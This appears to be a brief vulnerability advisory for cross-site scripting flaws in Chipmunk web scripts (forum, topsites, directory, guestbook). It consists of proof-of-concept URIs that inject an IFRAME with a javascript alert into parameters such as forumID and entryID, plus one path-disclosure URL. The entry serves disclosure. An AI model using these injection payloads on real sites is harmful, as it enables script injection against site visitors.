Chipmunk Multiple Cross-Site Scripting Vulnerabilities

Chipmunk Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

Proof-of-concept URIs are available:

http://www.example.com/board/newtopic.php?forumID='%3C/a>%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E
http://www.example.com/board/quote.php?forumID='%3C/a>%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E
& [ board/index.php , board/reply.php ]
http://www.example.com/topsites/recommend.php?ID='%3C/a>%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E

http://www.example.com/directory/recommend.php?entryID='%3C/a>%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E
Demonstration Path Disclosure URL :
http://www.example.com/guestbook/index.php?start='